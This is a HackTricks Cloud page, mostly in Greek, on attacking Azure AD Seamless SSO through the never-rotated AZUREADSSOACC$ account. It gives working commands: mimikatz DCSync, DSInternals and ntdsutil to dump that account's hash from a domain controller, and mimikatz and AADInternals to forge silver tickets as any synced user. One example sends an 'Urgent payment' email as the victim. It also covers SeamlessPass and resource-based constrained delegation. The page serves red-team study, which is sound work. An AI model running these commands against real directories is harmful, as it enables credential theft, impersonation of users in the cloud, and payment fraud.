Az - Seamless SSO

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Basic Information

From the docs: Η Seamless Single Sign-On (SSO) του Azure Active Directory (Azure AD Seamless SSO) συνδέει αυτόματα τους χρήστες όταν βρίσκονται σε εταιρικές συσκευές που είναι συνδεδεμένες στο εταιρικό σας δίκτυο. Όταν είναι ενεργοποιημένο, οι χρήστες δεν χρειάζεται να πληκτρολογούν τους κωδικούς πρόσβασης τους για να συνδεθούν στο Azure AD, και συνήθως, ούτε καν τα ονόματα χρήστη τους. Αυτή η δυνατότητα παρέχει στους χρήστες σας εύκολη πρόσβαση στις εφαρμογές σας που βασίζονται στο cloud χωρίς να χρειάζονται επιπλέον τοπικά στοιχεία.

Βασικά, η Seamless SSO του Azure AD συνδέει τους χρήστες όταν βρίσκονται σε υπολογιστή που είναι συνδεδεμένος σε τοπικό τομέα.

Υποστηρίζεται τόσο από PHS (Password Hash Sync) όσο και από PTA (Pass-through Authentication).

Η SSO για επιτραπέζιους υπολογιστές χρησιμοποιεί Kerberos για την αυθεντικοποίηση. Όταν ρυθμιστεί, το Azure AD Connect δημιουργεί έναν λογαριασμό υπολογιστή που ονομάζεται AZUREADSSOACC$ στο τοπικό AD. Ο κωδικός πρόσβασης του λογαριασμού AZUREADSSOACC$ αποστέλλεται ως απλό κείμενο στο Azure AD κατά τη διάρκεια της ρύθμισης.

Οι εισιτήριοι Kerberos είναι κρυπτογραφημένοι χρησιμοποιώντας το NTHash (MD4) του κωδικού πρόσβασης και το Azure AD χρησιμοποιεί τον αποσταλμένο κωδικό πρόσβασης για να αποκρυπτογραφήσει τους εισιτήριους.

Το Azure AD εκθέτει ένα σημείο πρόσβασης (https://autologon.microsoftazuread-sso.com) που δέχεται εισιτήρια Kerberos. Ο περιηγητής της μηχανής που είναι συνδεδεμένη στο τομέα προωθεί τα εισιτήρια σε αυτό το σημείο πρόσβασης για SSO.

On-prem -> cloud

Ο κωδικός πρόσβασης του χρήστη AZUREADSSOACC$ ποτέ δεν αλλάζει. Επομένως, ένας διαχειριστής τομέα θα μπορούσε να παραβιάσει τον hash αυτού του λογαριασμού, και στη συνέχεια να τον χρησιμοποιήσει για να δημιουργήσει ασημένια εισιτήρια για να συνδεθεί στο Azure με οποιονδήποτε τοπικό χρήστη που έχει συγχρονιστεί:

# Dump hash using mimikatz
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\azureadssoacc$ /domain:domain.local /dc:dc.domain.local"'
mimikatz.exe "lsadump::dcsync /user:AZUREADSSOACC$" exit

# Dump hash using https://github.com/MichaelGrafnetter/DSInternals
Get-ADReplAccount -SamAccountName 'AZUREADSSOACC$' -Domain contoso -Server lon-dc1.contoso.local

# Dump using ntdsutil and DSInternals
## Dump NTDS.dit
ntdsutil "ac i ntds" "ifm” "create full C:\temp" q q
## Extract password
Install-Module DSInternals
Import-Module DSInternals
$key = Get-BootKey -SystemHivePath 'C:\temp\registry\SYSTEM'
(Get-ADDBAccount -SamAccountName 'AZUREADSSOACC$' -DBPath 'C:\temp\Active Directory\ntds.dit' -BootKey $key).NTHash | Format-Hexos

Με το hash μπορείτε τώρα να δημιουργήσετε ασημένια εισιτήρια:

# Get users and SIDs
Get-AzureADUser | Select UserPrincipalName,OnPremisesSecurityIdentifier

# Create a silver ticket to connect to Azure with mimikatz
Invoke-Mimikatz -Command '"kerberos::golden /user:onpremadmin /sid:S-1-5-21-123456789-1234567890-123456789 /id:1105 /domain:domain.local /rc4:<azureadssoacc hash> /target:aadg.windows.net.nsatc.net /service:HTTP /ptt"'
mimikatz.exe "kerberos::golden /user:elrond /sid:S-1-5-21-2121516926-2695913149-3163778339 /id:1234 /domain:contoso.local /rc4:12349e088b2c13d93833d0ce947676dd /target:aadg.windows.net.nsatc.net /service:HTTP /ptt" exit

# Create silver ticket with AADInternal to access Exchange Online
$kerberos=New-AADIntKerberosTicket -SidString "S-1-5-21-854168551-3279074086-2022502410-1104" -Hash "097AB3CBED7B9DD6FE6C992024BC38F4"
$at=Get-AADIntAccessTokenForEXO -KerberosTicket $kerberos -Domain company.com
## Send email
Send-AADIntOutlookMessage -AccessToken $at -Recipient "someone@company.com" -Subject "Urgent payment" -Message "<h1>Urgent!</h1><br>The following bill should be paid asap."

Για να χρησιμοποιήσετε το silver ticket, θα πρέπει να εκτελέσετε τα εξής βήματα:

Εκκίνηση του Προγράμματος Περιήγησης: Πρέπει να εκκινήσετε το Mozilla Firefox.
Ρύθμιση του Προγράμματος Περιήγησης:

Μεταβείτε στο about:config.
Ρυθμίστε την προτίμηση για network.negotiate-auth.trusted-uris στις καθορισμένες τιμές:
https://aadg.windows.net.nsatc.net
https://autologon.microsoftazuread-sso.com

Πρόσβαση στην Ιστοσελίδα Εφαρμογής:

Επισκεφθείτε μια διαδικτυακή εφαρμογή που είναι ενσωματωμένη με το AAD domain της οργάνωσης. Ένα κοινό παράδειγμα είναι το Office 365.

Διαδικασία Αυθεντικοποίησης:

Στην οθόνη σύνδεσης, πρέπει να εισαχθεί το όνομα χρήστη, αφήνοντας το πεδίο κωδικού πρόσβασης κενό.
Για να προχωρήσετε, πατήστε είτε TAB είτε ENTER.

Αυτό δεν παρακάμπτει το MFA αν είναι ενεργοποιημένο

Επιλογή 2 χωρίς dcsync - SeamlessPass

Είναι επίσης δυνατό να εκτελέσετε αυτήν την επίθεση χωρίς επίθεση dcsync για να είστε πιο διακριτικοί, όπως εξηγείται σε αυτήν την ανάρτηση ιστολογίου. Για αυτό χρειάζεστε μόνο ένα από τα εξής:

TGT ενός συμβιβασμένου χρήστη: Ακόμα και αν δεν έχετε ένα, αλλά ο χρήστης έχει συμβιβαστεί, μπορείτε να αποκτήσετε ένα χρησιμοποιώντας το κόλπο ψεύτικης ανάθεσης TGT που έχει υλοποιηθεί σε πολλά εργαλεία όπως το Kekeo και το Rubeus.
Golden Ticket: Αν έχετε το κλειδί KRBTGT, μπορείτε να δημιουργήσετε το TGT που χρειάζεστε για τον επιτιθέμενο χρήστη.
NTLM hash ή AES key ενός συμβιβασμένου χρήστη: Το SeamlessPass θα επικοινωνήσει με τον ελεγκτή τομέα με αυτές τις πληροφορίες για να δημιουργήσει το TGT.
NTLM hash ή AES key του λογαριασμού AZUREADSSOACC$: Με αυτές τις πληροφορίες και τον Αναγνωριστικό Ασφαλείας (SID) του χρήστη που θέλετε να επιτεθείτε, είναι δυνατό να δημιουργήσετε ένα service ticket και να αυθεντικοποιηθείτε με το cloud (όπως εκτελέστηκε στην προηγούμενη μέθοδο).

Τέλος, με το TGT είναι δυνατό να χρησιμοποιήσετε το εργαλείο SeamlessPass με:

seamlesspass -tenant corp.com -domain corp.local -dc dc.corp.local -tgt <base64_TGT>

Περισσότερες πληροφορίες για να ρυθμίσετε το Firefox να λειτουργεί με seamless SSO μπορείτε να βρείτε σε αυτή την ανάρτηση blog.

Δημιουργία Kerberos tickets για χρήστες μόνο στο cloud

Εάν οι διαχειριστές του Active Directory έχουν πρόσβαση στο Azure AD Connect, μπορούν να ορίσουν SID για οποιονδήποτε χρήστη cloud. Με αυτόν τον τρόπο, τα Kerberos tickets μπορούν να δημιουργηθούν και για χρήστες μόνο στο cloud. Η μόνη απαίτηση είναι ότι το SID είναι ένα κατάλληλο SID.

Η αλλαγή του SID των χρηστών διαχειριστών μόνο στο cloud είναι τώρα μπλοκαρισμένη από τη Microsoft. Για πληροφορίες δείτε https://aadinternals.com/post/on-prem_admin/

On-prem -> Cloud μέσω Resource Based Constrained Delegation

Οποιοσδήποτε μπορεί να διαχειριστεί λογαριασμούς υπολογιστών (AZUREADSSOACC$) στο κοντέινερ ή OU όπου βρίσκεται αυτός ο λογαριασμός, μπορεί να ρυθμίσει μια περιορισμένη ανάθεση πόρων πάνω στον λογαριασμό και να έχει πρόσβαση σε αυτόν.

python rbdel.py -u <workgroup>\\<user> -p <pass> <ip> azureadssosvc$

Αναφορές

Υποστήριξη HackTricks

Ελέγξτε τα σχέδια συνδρομής!
Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.

PreviousAz - PTA - Pass-through Authentication NextAz - Arc vulnerable GPO Deploy Script

Last updated 3 days ago